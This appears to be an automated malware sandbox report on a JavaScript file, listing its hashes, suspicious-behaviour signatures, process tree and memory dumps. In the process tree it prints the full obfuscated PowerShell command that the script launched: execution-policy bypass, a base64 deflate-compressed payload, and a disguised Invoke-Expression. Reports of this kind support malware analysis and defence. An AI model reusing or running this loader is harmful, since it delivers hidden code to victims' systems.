5139042abdffe2246bdb46ad71300c9271194697d85741bccaaab4977fa02783

General

Target

1.js
Size

40KB
MD5

f297762186cba5a11c2d09c66b61ae97
SHA1

5a38dcaac81399d9d6c2bbbac0cc601e4a6950d9
SHA256

ef8acdcee4cf21c8a88af63119596dfe7b4971b53d4e96b0a05500c7ae50b1d3
SHA512

b6ff2066d8d091f9b64b60b9d48a604ebd6dc038877aa6764d39db7347d5173debe4ab46ddf94d09d93777bb3d696f5c7a2b33469ac2a84b83fdffed27cadc32
SSDEEP

384:4EZdlKCY9L+gGpL0trwZxyHa9q0w7cft19UQ1+e9d0dpcbg:42ladGpLgwKGRF1eBcbg

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1636 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewhoami.exe

description pid process

Token: SeDebugPrivilege 1636 powershell.exe
Token: SeDebugPrivilege 268 whoami.exe

pid	process
1636	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	268	whoami.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exe

description	pid	process	target process
PID 2032 wrote to memory of 1636	2032	wscript.exe	powershell.exe
PID 2032 wrote to memory of 1636	2032	wscript.exe	powershell.exe
PID 2032 wrote to memory of 1636	2032	wscript.exe	powershell.exe
PID 1636 wrote to memory of 268	1636	powershell.exe	whoami.exe
PID 1636 wrote to memory of 268	1636	powershell.exe	whoami.exe
PID 1636 wrote to memory of 268	1636	powershell.exe	whoami.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exECutionpO byPasS "(neW-oBJeCT Io.CoMPrEsSIon.DEfLaTesTrEam([SYstEM.iO.MemOryStREAM] [sYStEm.CONvErT]::fRombASe64sTrING( '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') ,[iO.cOMpRESsIoN.COmpRESsioNmodE]::dEcoMPReSS)| %{neW-oBJeCT SySTEM.Io.STREAmREADER( $_ ,[text.enCoDing]::asCIi)} | % {$_.reADtOeNd()} ) | . ( $shelLID[1]+$sHeLliD[13]+'x')"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\system32\whoami.exe
"C:\Windows\system32\whoami.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:268

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/268-61-0x0000000000000000-mapping.dmp

Download
memory/1636-55-0x0000000000000000-mapping.dmp

Download
memory/1636-57-0x000007FEF3350000-0x000007FEF3D73000-memory.dmp

Filesize
10.1MB

Download
memory/1636-59-0x00000000029E4000-0x00000000029E7000-memory.dmp

Filesize
12KB

Download
memory/1636-58-0x000007FEF27F0000-0x000007FEF334D000-memory.dmp

Filesize
11.4MB

Download
memory/1636-60-0x000000001B800000-0x000000001BAFF000-memory.dmp

Filesize
3.0MB

Download
memory/1636-62-0x00000000029E4000-0x00000000029E7000-memory.dmp

Filesize
12KB

Download
memory/1636-63-0x00000000029EB000-0x0000000002A0A000-memory.dmp

Filesize
124KB

Download
memory/2032-54-0x000007FEFB7C1000-0x000007FEFB7C3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads